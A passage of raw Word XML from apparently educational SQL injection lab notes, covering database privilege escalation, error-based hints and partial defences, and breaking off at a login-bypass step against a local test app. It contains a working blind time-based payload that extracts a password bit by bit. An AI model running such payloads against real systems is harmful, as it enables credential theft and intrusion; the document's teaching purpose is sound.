            <wp:docPr id="208295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8593" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1190625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5343462E" w14:textId="77777777" w:rsidR="00E03E7C" w:rsidRPr="00E03E7C" w:rsidRDefault="00E03E7C" w:rsidP="00E03E7C">
      <w:r w:rsidRPr="00E03E7C">
        <w:t>Page pauses → confirmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541FF764" w14:textId="67D75C45" w:rsidR="000D1FE3" w:rsidRDefault="000D1FE3" w:rsidP="000D1FE3">
      <w:r>
        <w:t xml:space="preserve">Step7: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1FE3">
        <w:t>Bit-by-Bit Extraction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1FE3">
        <w:t>admin' AND (ASCII(SUBSTR(password,1,1)) &amp; 1)=1 AND sleep(5) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696AEBE0" w14:textId="4FB592B8" w:rsidR="007306CA" w:rsidRPr="006F1661" w:rsidRDefault="00BC5EE9" w:rsidP="00BC5EE9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC5EE9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03CA6C46" wp14:editId="07A85B3A">
            <wp:extent cx="4820323" cy="1476581"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2017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886" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId82"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4820323" cy="1476581"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23422108" w14:textId="6C8D3465" w:rsidR="008A0615" w:rsidRDefault="008A0615">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="001FE8B4" w14:textId="1DE97BAC" w:rsidR="006F1661" w:rsidRPr="008A0615" w:rsidRDefault="00CF77B4" w:rsidP="006F1661">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF77B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Beyond SQL Injection: Escalating the Database Attack</w:t>
      </w:r>
      <w:r w:rsidR="008A0615">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A71E0A" w14:textId="3B9C6418" w:rsidR="008A0615" w:rsidRPr="008A0615" w:rsidRDefault="008A0615" w:rsidP="008A0615">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A0615">
        <w:t>SQL injection doesn’t just mean “data stolen”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67382B04" w14:textId="64B8B15F" w:rsidR="008A0615" w:rsidRPr="008A0615" w:rsidRDefault="008A0615" w:rsidP="008A0615">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A0615">
        <w:t>Databases often contain ways to gain more power and access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D719EF" w14:textId="750E8928" w:rsidR="008A0615" w:rsidRPr="008A0615" w:rsidRDefault="008A0615" w:rsidP="008A0615">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A0615">
        <w:t>Updates and security hardening help, but can’t stop everything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191355BE" w14:textId="049D987B" w:rsidR="008A0615" w:rsidRDefault="008A0615" w:rsidP="006F1661">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A0615">
        <w:t xml:space="preserve">Database security needs to assume attackers </w:t>
      </w:r>
      <w:r w:rsidRPr="008A0615">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>might already be inside</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0011432E" w14:textId="0EFEC734" w:rsidR="008A22B8" w:rsidRDefault="008A22B8" w:rsidP="006F1661">
      <w:r w:rsidRPr="008A22B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>MS-SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6016E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017A22F7" w14:textId="5619A65F" w:rsidR="008A0615" w:rsidRPr="008A0615" w:rsidRDefault="008A0615" w:rsidP="00762666">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008A0615">
        <w:t>MS-SQL isn’t just about storing data—it can interact with the operating system and the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459C1DCB" w14:textId="0BA13498" w:rsidR="008A0615" w:rsidRPr="008A0615" w:rsidRDefault="008A0615" w:rsidP="00762666">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008A0615">
        <w:t>If attackers get high-level database access, they can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112FDA34" w14:textId="77777777" w:rsidR="008A0615" w:rsidRPr="008A0615" w:rsidRDefault="008A0615" w:rsidP="00762666">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008A0615">
        <w:t>Take over the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D2B994" w14:textId="77777777" w:rsidR="008A0615" w:rsidRPr="008A0615" w:rsidRDefault="008A0615" w:rsidP="00762666">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008A0615">
        <w:t>Move deeper into the internal network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762667E9" w14:textId="77777777" w:rsidR="008A0615" w:rsidRPr="008A0615" w:rsidRDefault="008A0615" w:rsidP="00762666">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008A0615">
        <w:t>Steal data quietly and efficiently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B48050" w14:textId="5707A9E5" w:rsidR="008A0615" w:rsidRDefault="008A0615" w:rsidP="006F1661">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008A0615">
        <w:t>The biggest mistake is assuming: “The database is safe because only our application uses it.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CB2BDA" w14:textId="77777777" w:rsidR="00762666" w:rsidRDefault="00762666" w:rsidP="00762666">
      <w:r w:rsidRPr="008A22B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>MS-SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6016E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444DC1EA" w14:textId="27A4D208" w:rsidR="00E33EB4" w:rsidRPr="00E33EB4" w:rsidRDefault="00E33EB4" w:rsidP="00E33EB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E33EB4">
        <w:t>Oracle has historically had many ways to escalate privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76150AEA" w14:textId="4782C044" w:rsidR="00E33EB4" w:rsidRPr="00E33EB4" w:rsidRDefault="00E33EB4" w:rsidP="00E33EB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E33EB4">
        <w:t>SQL injection can be the doorway to full database control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2050BC34" w14:textId="1027A436" w:rsidR="00E33EB4" w:rsidRPr="00E33EB4" w:rsidRDefault="00E33EB4" w:rsidP="00E33EB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E33EB4">
        <w:t>Some attacks exploit bugs; others abuse powerful default features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006103C6" w14:textId="7EAAA37B" w:rsidR="00B722AD" w:rsidRDefault="00E33EB4" w:rsidP="00B722AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E33EB4">
        <w:t>Even “normal” database users may have more power than expected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7603870D" w14:textId="058CDA50" w:rsidR="00B722AD" w:rsidRDefault="00B722AD" w:rsidP="006F1661">
      <w:r w:rsidRPr="008A22B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00042052">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="008A22B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6016E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701A10A8" w14:textId="6A89E08C" w:rsidR="00676AC8" w:rsidRPr="00A57E1D" w:rsidRDefault="00676AC8" w:rsidP="00676AC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A57E1D">
        <w:t>MySQL is generally less risky by default than some other databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FDEE40" w14:textId="565ACB61" w:rsidR="00676AC8" w:rsidRPr="00A57E1D" w:rsidRDefault="00676AC8" w:rsidP="00676AC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A57E1D">
        <w:t>But giving users powerful permissions (like file access) is dangerous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A9D268" w14:textId="59FD4EAE" w:rsidR="00676AC8" w:rsidRPr="00A57E1D" w:rsidRDefault="00676AC8" w:rsidP="00676AC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A57E1D">
        <w:t>SQL injection + excessive permissions can still lead to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F9D2B8" w14:textId="77777777" w:rsidR="00676AC8" w:rsidRPr="00676AC8" w:rsidRDefault="00676AC8" w:rsidP="00A57E1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00676AC8">
        <w:t>File theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2615CF1C" w14:textId="77777777" w:rsidR="00676AC8" w:rsidRPr="00676AC8" w:rsidRDefault="00676AC8" w:rsidP="00A57E1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00676AC8">
        <w:t>Data bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB73F16" w14:textId="77777777" w:rsidR="00676AC8" w:rsidRPr="00676AC8" w:rsidRDefault="00676AC8" w:rsidP="00A57E1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00676AC8">
        <w:t>Full control of the database server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114FBC61" w14:textId="77777777" w:rsidR="00676AC8" w:rsidRDefault="00676AC8" w:rsidP="006F1661"/>
    <w:p w14:paraId="4ADC5CBE" w14:textId="3E19EEAF" w:rsidR="009E1A0C" w:rsidRPr="009E1A0C" w:rsidRDefault="001E48B4" w:rsidP="006F1661">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E48B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SQL Syntax and Error Reference</w:t>
      </w:r>
      <w:r w:rsidR="009E1A0C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102D5872" w14:textId="5E0B7752" w:rsidR="0056447F" w:rsidRPr="003C01E1" w:rsidRDefault="0056447F" w:rsidP="0056447F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C01E1">
        <w:t>Different databases = different SQL syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A6D68C" w14:textId="3AACA225" w:rsidR="0056447F" w:rsidRPr="003C01E1" w:rsidRDefault="0056447F" w:rsidP="0056447F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C01E1">
        <w:t>Error messages = valuable hints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39817720" w14:textId="68D77740" w:rsidR="0056447F" w:rsidRPr="003C01E1" w:rsidRDefault="0056447F" w:rsidP="0056447F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C01E1">
        <w:t>SQL injection is often confirmed when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C3DE4B" w14:textId="77777777" w:rsidR="0056447F" w:rsidRPr="003C01E1" w:rsidRDefault="0056447F" w:rsidP="0056447F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C01E1">
        <w:t>' breaks the query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1333AAA8" w14:textId="77777777" w:rsidR="0056447F" w:rsidRPr="003C01E1" w:rsidRDefault="0056447F" w:rsidP="0056447F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C01E1">
        <w:t>Errors change based on input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4026A67A" w14:textId="77777777" w:rsidR="0056447F" w:rsidRPr="003C01E1" w:rsidRDefault="0056447F" w:rsidP="0056447F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C01E1">
        <w:t>Time delays work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CD800C" w14:textId="5E5EA80F" w:rsidR="0056447F" w:rsidRPr="003C01E1" w:rsidRDefault="0056447F" w:rsidP="0056447F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C01E1">
        <w:t>UNION errors help attackers map columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B60B26" w14:textId="6188502A" w:rsidR="0056447F" w:rsidRPr="003C01E1" w:rsidRDefault="0056447F" w:rsidP="0056447F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C01E1">
        <w:t>Type errors help attackers understand field types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FFD8A8" w14:textId="54825CEB" w:rsidR="0056447F" w:rsidRDefault="0056447F" w:rsidP="006F1661"/>
    <w:p w14:paraId="361303F2" w14:textId="77777777" w:rsidR="002A7909" w:rsidRDefault="002A7909">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B5A43F" w14:textId="7326E458" w:rsidR="0031744E" w:rsidRPr="009E1A0C" w:rsidRDefault="0031744E" w:rsidP="0031744E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Preventing SQL injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE96929" w14:textId="03F4F551" w:rsidR="0031744E" w:rsidRPr="00F7274B" w:rsidRDefault="00F7274B" w:rsidP="006F1661">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7274B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Partially Effective Measures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1725D94B" w14:textId="4D0F61B1" w:rsidR="002A7909" w:rsidRPr="002A7909" w:rsidRDefault="002A7909" w:rsidP="002A7909">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002A7909">
        <w:t>SQL injection happens when user input is treated as SQL code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220DBE62" w14:textId="6B565FFC" w:rsidR="002A7909" w:rsidRPr="002A7909" w:rsidRDefault="002A7909" w:rsidP="002A7909">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002A7909">
        <w:t>Escaping quotes is not enough — numbers and second-order attacks bypass it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044D688F" w14:textId="01F98881" w:rsidR="002A7909" w:rsidRPr="002A7909" w:rsidRDefault="002A7909" w:rsidP="002A7909">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002A7909">
        <w:t>Stored procedures are not automatically safe if written or called incorrectly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6187D217" w14:textId="4813D493" w:rsidR="00F7274B" w:rsidRDefault="002A7909" w:rsidP="006F1661">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002A7909">
        <w:t>Partial defenses create false confidence and leave applications vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6881299B" w14:textId="546990AD" w:rsidR="00457262" w:rsidRPr="00F7274B" w:rsidRDefault="00457262" w:rsidP="00457262">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Observing if </w:t>
      </w:r>
      <w:r w:rsidRPr="00F7274B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Partially Effective Measures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> is good or not</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7274B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD0A61B" w14:textId="4B816088" w:rsidR="00457262" w:rsidRDefault="00CF4960" w:rsidP="006F1661">
      <w:r>
        <w:t>App.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500EC0B0" w14:textId="0D3696D1" w:rsidR="00CF4960" w:rsidRDefault="00CF4960" w:rsidP="006F1661">
      <w:r>
        <w:t>Browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C62F635" w14:textId="4A734105" w:rsidR="00CF4960" w:rsidRDefault="006420C1" w:rsidP="006F1661">
      <w:r w:rsidRPr="006420C1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42924245" wp14:editId="050A391D">
            <wp:extent cx="5731510" cy="2132330"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="12297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365" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId83"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2132330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53026B14" w14:textId="45F8B078" w:rsidR="00CF4960" w:rsidRDefault="00CF4960" w:rsidP="006F1661">
      <w:r>
        <w:t xml:space="preserve">Step1: </w:t>
      </w:r>
      <w:r w:rsidR="006420C1">
        <w:t>(Goal: test like normal users) Use credentials: alice/alice123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A49FB7D" w14:textId="39D7B08B" w:rsidR="006420C1" w:rsidRDefault="006420C1" w:rsidP="003B7CEA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006420C1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="229C9DAA" wp14:editId="5E07F76F">
            <wp:extent cx="3688080" cy="1778254"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="55191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9033" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId84"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3693815" cy="1781019"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5318A027" w14:textId="5F576BD8" w:rsidR="006420C1" w:rsidRDefault="006420C1" w:rsidP="003B7CEA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006420C1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37D1368E" wp14:editId="30170632">
            <wp:extent cx="5232392" cy="1790700"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="144933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31468" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId85"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5249814" cy="1796662"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4875A9" w14:textId="77777777" w:rsidR="00BB5869" w:rsidRDefault="00BB5869" w:rsidP="003B7CEA"/>
    <w:p w14:paraId="328C9FD4" w14:textId="3BCEF2E1" w:rsidR="003B7CEA" w:rsidRDefault="00283515" w:rsidP="003B7CEA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step2: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="00283515">
        <w:t>Login bypass</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="008E42A1">
